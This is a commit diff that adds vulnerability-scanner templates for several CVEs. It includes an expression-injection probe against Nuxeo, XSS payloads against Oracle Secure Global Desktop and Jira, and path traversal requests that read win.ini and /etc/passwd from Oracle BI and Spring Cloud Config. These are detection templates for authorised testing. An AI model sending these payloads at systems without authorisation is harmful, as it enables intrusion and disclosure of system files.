Pushing newly added cves

2020-06-22 19:05:37 +05:30 · 2020-06-22 19:05:37 +05:30 · b7103a2197
parent 32d9373273
commit b7103a2197
6 changed files with 89 additions and 1 deletions
--- a/cves/CVE-2018-13379.yaml
+++ b/cves/CVE-2018-13379.yaml
@ -1,7 +1,7 @@
 id: CVE-2018-13379

 info:
-  name: FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure
+  name: FortiOS - Credentials Disclosure
  author: organiccrap
  severity: high

--- a/cves/CVE-2018-16341.yaml
+++ b/cves/CVE-2018-16341.yaml
@ -0,0 +1,16 @@
+id: CVE-2018-16341
+
+info:
+  name: Nuxeo Authentication Bypass Remote Code Execution
+  author: madrobot
+  severity: high
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/nuxeo/login.jsp/pwn${1330+7}.xhtml"
+    matchers:
+      - type: word
+        words:
+          - "1337"
+        part: body
--- a/cves/CVE-2018-19439.yaml
+++ b/cves/CVE-2018-19439.yaml
@ -0,0 +1,16 @@
+id: CVE-2018-19439
+
+info:
+  name: Cross Site Scripting in Oracle Secure Global Desktop Administration Console
+  author: madrobot
+  severity: high 
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--&>helpFile=concepts.html"
+    matchers:
+      - type: word
+        words:
+          - "<script>alert(1337)</script>"
+        part: body
--- a/cves/CVE-2018-20824.yaml
+++ b/cves/CVE-2018-20824.yaml
@ -0,0 +1,19 @@
+id: CVE-2018-20824
+
+info:
+  name: Atlassian Jira WallboardServlet XSS
+  author: madrobot
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)"
+    matchers:
+      - type: status
+        status:
+            - 200
+      - type: word
+        words:
+            - "alert(document.domain)"
+        part: body
--- a/cves/CVE-2019-2588.yaml
+++ b/cves/CVE-2019-2588.yaml
@ -0,0 +1,19 @@
+id: CVE-2019-2588
+
+info:
+  name: Oracle Business Intelligence Path Traversal
+  author: madrobot
+  severity: high
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini"
+      - "{{BaseURL}}:9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini"
+    matchers:
+      - type: word
+        words:
+          - 'for 16-bit app support'
+      - type: status
+        status:
+          - 200
--- a/cves/CVE-2019-3799.yaml
+++ b/cves/CVE-2019-3799.yaml
@ -0,0 +1,18 @@
+id: CVE-2019-3799
+info:
+  name: Spring-Cloud-Config-Server Directory Traversal
+  author: madrobot
+  severity: high
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"
+    matchers:
+      - type: status
+        status:
+            - 200
+      - type: regex
+        regex:
+            - "root:[x*]:0:0:"
+        part: body